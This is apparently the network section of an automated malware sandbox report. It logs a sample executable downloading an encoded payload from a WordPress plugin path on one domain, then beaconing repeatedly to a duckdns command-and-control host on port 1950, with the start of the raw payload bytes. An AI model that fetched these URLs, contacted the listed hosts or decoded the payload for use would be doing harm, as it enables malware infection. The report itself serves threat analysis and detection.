Nov 26, 2024 08:13:14.732672930 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.732716084 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.739185095 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.739202976 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.739274025 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.739294052 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.739345074 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.746267080 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.746284962 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.746331930 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.746344090 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.746386051 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.746386051 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.753691912 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.753710985 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.753774881 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.753783941 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.753829002 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.760724068 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.760741949 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.760797977 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.760827065 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.760844946 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.760875940 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.767992973 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.768011093 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.768070936 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.768080950 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.768129110 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.907490015 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.907519102 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.907660961 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.907687902 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.907733917 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.935925007 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.935950994 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.936038017 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.936067104 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.936110973 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.942322969 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.942342997 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.942403078 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.942413092 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.942457914 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.949733019 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.949752092 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.949810982 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.949822903 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.949858904 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.959568024 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.959590912 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.959647894 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.959657907 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.959698915 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.965080023 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.965100050 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.965157986 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.965167046 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.965187073 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.965205908 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.971344948 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.971362114 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.971417904 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.971426964 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.971442938 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.971466064 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.977858067 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.977874994 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.977957010 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:14.977972984 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:14.978030920 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.116220951 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.116245031 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.116311073 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.116322994 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.116379976 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.146357059 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.146375895 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.146442890 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.146455050 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.146492004 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.152844906 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.152863026 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.152941942 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.152960062 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.153008938 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.160233974 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.160252094 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.160320997 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.160346031 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.160392046 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.162365913 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.162426949 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.162430048 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:15.162481070 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.163692951 CET	49706	443	192.168.2.11	103.101.59.23
Nov 26, 2024 08:13:15.163711071 CET	443	49706	103.101.59.23	192.168.2.11
Nov 26, 2024 08:13:19.129321098 CET	49723	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:19.250232935 CET	1950	49723	172.111.212.138	192.168.2.11
Nov 26, 2024 08:13:19.251193047 CET	49723	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:19.352068901 CET	49723	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:19.472218037 CET	1950	49723	172.111.212.138	192.168.2.11
Nov 26, 2024 08:13:41.173486948 CET	1950	49723	172.111.212.138	192.168.2.11
Nov 26, 2024 08:13:41.179260015 CET	49723	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:41.179439068 CET	49723	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:41.299293995 CET	1950	49723	172.111.212.138	192.168.2.11
Nov 26, 2024 08:13:42.186419010 CET	49776	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:42.306443930 CET	1950	49776	172.111.212.138	192.168.2.11
Nov 26, 2024 08:13:42.306574106 CET	49776	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:42.310358047 CET	49776	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:13:42.430349112 CET	1950	49776	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:04.242882013 CET	1950	49776	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:04.242949009 CET	49776	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:04.244569063 CET	49776	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:04.364469051 CET	1950	49776	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:05.250221968 CET	49827	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:05.370208979 CET	1950	49827	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:05.370294094 CET	49827	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:05.374039888 CET	49827	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:05.494009018 CET	1950	49827	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:27.274513960 CET	1950	49827	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:27.274594069 CET	49827	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:27.274811029 CET	49827	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:27.394763947 CET	1950	49827	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:28.602652073 CET	49879	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:28.723149061 CET	1950	49879	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:28.727269888 CET	49879	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:28.730811119 CET	49879	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:28.850811005 CET	1950	49879	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:50.737365961 CET	1950	49879	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:50.737461090 CET	49879	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:50.738392115 CET	49879	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:50.859038115 CET	1950	49879	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:51.750106096 CET	49931	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:51.870093107 CET	1950	49931	172.111.212.138	192.168.2.11
Nov 26, 2024 08:14:51.870189905 CET	49931	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:51.873931885 CET	49931	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:14:51.993915081 CET	1950	49931	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:13.862700939 CET	1950	49931	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:13.862812042 CET	49931	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:13.862905979 CET	49931	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:13.982984066 CET	1950	49931	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:14.875241041 CET	49983	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:14.995440960 CET	1950	49983	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:14.999378920 CET	49983	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:15.002876043 CET	49983	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:15.123012066 CET	1950	49983	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:36.901051044 CET	1950	49983	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:36.901138067 CET	49983	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:36.901191950 CET	49983	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:37.021434069 CET	1950	49983	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:38.234683990 CET	49984	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:38.354773998 CET	1950	49984	172.111.212.138	192.168.2.11
Nov 26, 2024 08:15:38.354876995 CET	49984	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:38.359608889 CET	49984	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:15:38.479983091 CET	1950	49984	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:00.308000088 CET	1950	49984	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:00.311435938 CET	49984	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:00.311499119 CET	49984	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:00.431579113 CET	1950	49984	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:01.313066959 CET	49985	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:01.433160067 CET	1950	49985	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:01.435390949 CET	49985	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:01.438931942 CET	49985	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:01.560270071 CET	1950	49985	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:23.364281893 CET	1950	49985	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:23.367443085 CET	49985	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:23.367548943 CET	49985	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:23.487541914 CET	1950	49985	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:24.375443935 CET	49986	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:24.495584965 CET	1950	49986	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:24.499505043 CET	49986	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:24.503590107 CET	49986	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:24.624095917 CET	1950	49986	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:46.426772118 CET	1950	49986	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:46.429606915 CET	49986	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:46.429677963 CET	49986	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:46.549671888 CET	1950	49986	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:47.778012991 CET	49987	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:47.897980928 CET	1950	49987	172.111.212.138	192.168.2.11
Nov 26, 2024 08:16:47.901660919 CET	49987	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:47.905091047 CET	49987	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:16:48.025047064 CET	1950	49987	172.111.212.138	192.168.2.11
Nov 26, 2024 08:17:09.833601952 CET	1950	49987	172.111.212.138	192.168.2.11
Nov 26, 2024 08:17:09.835546017 CET	49987	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:17:09.835587025 CET	49987	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:17:09.955643892 CET	1950	49987	172.111.212.138	192.168.2.11
Nov 26, 2024 08:17:11.393451929 CET	49988	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:17:11.513982058 CET	1950	49988	172.111.212.138	192.168.2.11
Nov 26, 2024 08:17:11.514066935 CET	49988	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:17:11.523343086 CET	49988	1950	192.168.2.11	172.111.212.138
Nov 26, 2024 08:17:11.643409967 CET	1950	49988	172.111.212.138	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:13:08.286797047 CET	51604	53	192.168.2.11	1.1.1.1
Nov 26, 2024 08:13:08.979010105 CET	53	51604	1.1.1.1	192.168.2.11
Nov 26, 2024 08:13:18.798896074 CET	54344	53	192.168.2.11	1.1.1.1
Nov 26, 2024 08:13:19.126370907 CET	53	54344	1.1.1.1	192.168.2.11
Nov 26, 2024 08:14:28.281137943 CET	65436	53	192.168.2.11	1.1.1.1
Nov 26, 2024 08:14:28.601784945 CET	53	65436	1.1.1.1	192.168.2.11
Nov 26, 2024 08:15:37.906471014 CET	51808	53	192.168.2.11	1.1.1.1
Nov 26, 2024 08:15:38.233345032 CET	53	51808	1.1.1.1	192.168.2.11
Nov 26, 2024 08:16:47.437545061 CET	65246	53	192.168.2.11	1.1.1.1
Nov 26, 2024 08:16:47.776942968 CET	53	65246	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 08:13:08.286797047 CET	192.168.2.11	1.1.1.1	0xa460	Standard query (0)	aarzoomarine.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:18.798896074 CET	192.168.2.11	1.1.1.1	0x83aa	Standard query (0)	craekuro.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:14:28.281137943 CET	192.168.2.11	1.1.1.1	0x3151	Standard query (0)	craekuro.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:15:37.906471014 CET	192.168.2.11	1.1.1.1	0x76bc	Standard query (0)	craekuro.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:16:47.437545061 CET	192.168.2.11	1.1.1.1	0x968e	Standard query (0)	craekuro.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 08:13:08.979010105 CET	1.1.1.1	192.168.2.11	0xa460	No error (0)	aarzoomarine.com	103.101.59.23	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:13:19.126370907 CET	1.1.1.1	192.168.2.11	0x83aa	No error (0)	craekuro.duckdns.org	172.111.212.138	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:14:28.601784945 CET	1.1.1.1	192.168.2.11	0x3151	No error (0)	craekuro.duckdns.org	172.111.212.138	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:15:38.233345032 CET	1.1.1.1	192.168.2.11	0x76bc	No error (0)	craekuro.duckdns.org	172.111.212.138	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:16:47.776942968 CET	1.1.1.1	192.168.2.11	0x968e	No error (0)	craekuro.duckdns.org	172.111.212.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

aarzoomarine.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49706	103.101.59.23	443	7564	C:\Users\user\Desktop\1m181Ru74o.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:11 UTC	184	OUT	GET /wp-content/plugins/231_Ntmftfldhfc HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: aarzoomarine.com
2024-11-26 07:13:13 UTC	336	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Nov 2024 07:12:56 GMT Content-Type: application/octet-stream Content-Length: 1053816 Last-Modified: Tue, 13 Aug 2024 08:51:50 GMT Connection: close ETag: "66bb1ea6-101478" Strict-Transport-Security: max-age=15768000; includeSubDomains X-Powered-By: PleskLin Accept-Ranges: bytes
2024-11-26 07:13:13 UTC	16048	IN	Data Raw: 70 4b 79 6a 56 79 47 6c 72 30 6b 4f 4a 52 77 51 45 78 59 6a 45 43 55 51 45 53 45 66 48 52 30 6b 48 53 41 4e 46 79 55 69 48 43 55 68 44 68 38 69 46 53 41 5a 47 52 45 51 48 52 41 51 44 52 77 6c 49 42 30 66 48 78 38 6a 45 77 34 5a 44 52 63 4e 49 78 45 56 46 43 55 61 46 68 41 66 47 78 34 56 48 68 49 66 49 42 38 67 44 52 63 61 47 52 6b 57 44 52 6b 4f 45 42 73 6a 47 77 77 55 45 41 77 68 45 69 49 62 45 42 34 68 45 78 59 64 49 68 34 61 45 43 4d 67 44 68 61 6b 72 4b 4e 58 49 61 57 76 53 56 63 66 47 42 45 66 45 52 63 50 45 78 45 4f 70 4b 79 6a 56 79 47 6c 72 30 6d 71 6f 35 79 77 74 62 4b 6c 73 4b 4f 77 72 35 2b 68 6d 35 75 6b 6d 36 43 72 75 61 4f 65 6e 4b 4f 66 71 71 47 65 73 36 43 33 74 36 2b 77 6d 37 43 77 71 35 79 6a 6f 4a 75 68 6f 61 47 6c 74 61 71 33 71 37 6d Data Ascii: pKyjVyGlr0kOJRwQExYjECUQESEfHR0kHSANFyUiHCUhDh8iFSAZGREQHRAQDRwlIB0fHx8jEw4ZDRcNIxEVFCUaFhAfGx4VHhIfIB8gDRcaGRkWDRkOEBsjGwwUEAwhEiIbEB4hExYdIh4aECMgDhakrKNXIaWvSVcfGBEfERcPExEOpKyjVyGlr0mqo5ywtbKlsKOwr5+hm5ukm6CruaOenKOfqqGes6C3t6+wm7Cwq5yjoJuhoaGltaq3q7m
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 47 61 7a 62 59 4d 65 33 6a 79 43 31 34 33 61 46 66 36 30 73 61 68 51 4c 74 49 6b 54 50 6c 70 74 49 5a 41 32 39 79 54 49 31 53 4a 4c 7a 4a 79 65 5a 4c 79 45 74 5a 6e 4d 50 39 68 72 76 6f 75 31 75 2f 51 56 49 6d 41 51 54 44 68 39 6d 64 34 66 52 4a 44 46 4d 69 63 67 63 63 39 62 6c 50 47 6d 36 34 54 42 77 58 6b 59 46 36 4d 6f 79 6a 56 5a 77 38 4a 43 52 4a 4c 53 64 79 48 42 2f 35 62 64 54 52 45 53 75 39 66 4d 56 61 59 75 32 68 53 39 51 6c 6c 45 6e 6e 47 43 4c 78 57 35 68 75 54 70 36 78 77 38 45 49 33 6d 33 44 59 62 64 34 6a 52 31 56 6b 2b 70 7a 76 72 2f 62 79 57 50 31 53 69 4e 72 38 73 47 4d 7a 6c 70 50 55 79 57 65 51 4f 37 4d 64 2f 4e 32 32 36 46 63 6a 47 47 59 36 75 61 49 75 2b 7a 49 53 48 37 62 5a 73 4a 67 67 53 59 65 4f 69 53 73 41 65 57 74 4e 4d 53 77 58 Data Ascii: GazbYMe3jyC143aFf60sahQLtIkTPlptIZA29yTI1SJLzJyeZLyEtZnMP9hrvou1u/QVImAQTDh9md4fRJDFMicgcc9blPGm64TBwXkYF6MoyjVZw8JCRJLSdyHB/5bdTRESu9fMVaYu2hS9QllEnnGCLxW5huTp6xw8EI3m3DYbd4jR1Vk+pzvr/byWP1SiNr8sGMzlpPUyWeQO7Md/N226FcjGGY6uaIu+zISH7bZsJggSYeOiSsAeWtNMSwX
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 39 6b 6b 79 45 6f 4f 4f 36 69 4b 74 31 4e 59 4d 37 79 71 4f 79 67 2f 32 2b 4c 6f 46 4e 59 69 6e 79 35 35 6f 6d 73 36 35 72 4c 6a 4d 33 75 42 72 75 6c 46 66 39 6a 61 65 75 43 41 74 79 65 2f 47 75 73 33 43 4c 30 41 55 34 63 68 75 44 5a 72 48 61 57 46 51 72 6e 2f 44 56 6e 56 4d 6b 49 30 72 78 44 77 74 39 37 4f 46 47 75 33 6e 35 6c 30 74 6a 41 36 31 63 4a 66 57 47 36 52 4f 5a 67 41 72 53 7a 6b 4c 62 36 59 4c 7a 41 73 2f 2b 33 69 57 4f 78 56 51 39 44 4e 33 50 2b 35 73 2b 34 62 46 47 36 35 4b 6d 6e 6d 50 5a 4a 61 46 39 30 41 68 49 64 6a 4b 47 55 6d 35 37 4e 70 57 37 39 50 30 56 4d 41 62 55 30 50 6e 76 36 77 30 64 32 37 47 4e 6a 50 6b 66 33 6c 2b 32 43 45 38 70 2b 67 58 54 4e 62 65 4a 77 68 46 4e 79 73 7a 79 75 39 56 61 43 76 66 6d 33 67 45 67 4b 73 32 54 73 57 Data Ascii: 9kkyEoOO6iKt1NYM7yqOyg/2+LoFNYiny55oms65rLjM3uBrulFf9jaeuCAtye/Gus3CL0AU4chuDZrHaWFQrn/DVnVMkI0rxDwt97OFGu3n5l0tjA61cJfWG6ROZgArSzkLb6YLzAs/+3iWOxVQ9DN3P+5s+4bFG65KmnmPZJaF90AhIdjKGUm57NpW79P0VMAbU0Pnv6w0d27GNjPkf3l+2CE8p+gXTNbeJwhFNyszyu9VaCvfm3gEgKs2TsW
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 45 44 30 4a 52 59 72 54 41 6c 6e 4d 55 78 59 68 78 46 4c 67 4c 41 42 67 31 30 72 79 69 37 4e 30 51 52 47 4a 7a 47 47 61 50 70 50 6f 68 70 62 71 6e 31 4e 37 4a 5a 58 43 67 72 6b 51 4f 7a 55 41 35 79 61 76 43 72 77 4e 68 6d 52 51 69 76 4b 6c 4a 31 36 55 51 67 69 48 61 50 4a 57 45 58 4d 55 5a 74 48 7a 6e 6e 52 51 61 4c 34 77 2f 5a 44 67 35 48 6e 78 57 68 4d 41 32 4d 34 52 4a 6a 51 32 78 67 32 62 59 33 71 55 47 6d 57 36 54 6e 53 72 32 4e 49 36 56 4b 45 73 4d 2f 6c 52 7a 47 57 36 4f 51 56 70 6e 6a 45 42 77 6a 6e 61 64 68 75 42 74 4e 76 59 64 59 47 53 63 41 34 78 31 33 31 44 67 49 48 54 39 59 35 4f 58 63 58 61 78 79 75 79 79 44 34 59 6c 6c 38 37 74 34 67 43 55 76 35 63 4f 57 53 33 45 6b 68 34 75 6a 5a 64 6c 33 4a 4e 39 67 38 4b 77 33 6d 65 44 4c 41 57 5a 2b 65 Data Ascii: ED0JRYrTAlnMUxYhxFLgLABg10ryi7N0QRGJzGGaPpPohpbqn1N7JZXCgrkQOzUA5yavCrwNhmRQivKlJ16UQgiHaPJWEXMUZtHznnRQaL4w/ZDg5HnxWhMA2M4RJjQ2xg2bY3qUGmW6TnSr2NI6VKEsM/lRzGW6OQVpnjEBwjnadhuBtNvYdYGScA4x131DgIHT9Y5OXcXaxyuyyD4Yll87t4gCUv5cOWS3Ekh4ujZdl3JN9g8Kw3meDLAWZ+e
2024-11-26 07:13:13 UTC	16384	IN	Data Raw: 34 47 4e 4d 59 4c 68 37 46 55 61 68 49 62 34 41 77 36 34 30 6c 58 74 76 6d 43 2f 32 2f 65 39 59 77 42 44 79 4c 68 5a 6d 68 7a 79 41 48 68 70 39 61 69 69 44 4c 32 56 37 53 42 4e 4e 61 35 64 48 50 34 55 6d 53 72 58 45 56 2f 30 30 77 58 72 57 58 47 4b 6c 4f 38 73 44 2b 6e 4f 42 58 67 59 49 44 41 61 31 46 41 6b 58 44 2b 54 4d 4f 6b 52 51 55 34 71 63 50 51 6f 68 73 50 39 73 77 53 70 7a 6f 69 33 31 45 57 4a 46 53 48 79 72 41 58 49 4e 4e 51 4c 4a 4b 49 39 63 4e 31 69 32 68 54 76 69 32 67 77 46 74 72 71 67 33 48 64 35 6d 4d 35 33 79 35 64 4e 63 58 54 42 6e 43 5a 4a 4d 43 63 59 57 68 57 2f 50 33 55 62 2f 74 38 37 62 44 37 57 4b 32 67 57 4a 6c 6c 39 52 46 37 76 57 64 42 67 76 72 6c 74 62 38 35 53 7a 41 30 63 54 6f 4d 73 43 68 6e 46 4a 44 73 46 75 7a 6c 35 4b 4e 78 Data Ascii: 4GNMYLh7FUahIb4Aw640lXtvmC/2/e9YwBDyLhZmhzyAHhp9aiiDL2V7SBNNa5dHP4UmSrXEV/00wXrWXGKlO8sD+nOBXgYIDAa1FAkXD+TMOkRQU4qcPQohsP9swSpzoi31EWJFSHyrAXINNQLJKI9cN1i2hTvi2gwFtrqg3Hd5mM53y5dNcXTBnCZJMCcYWhW/P3Ub/t87bD7WK2gWJll9RF7vWdBgvrltb85SzA0cToMsChnFJDsFuzl5KNx
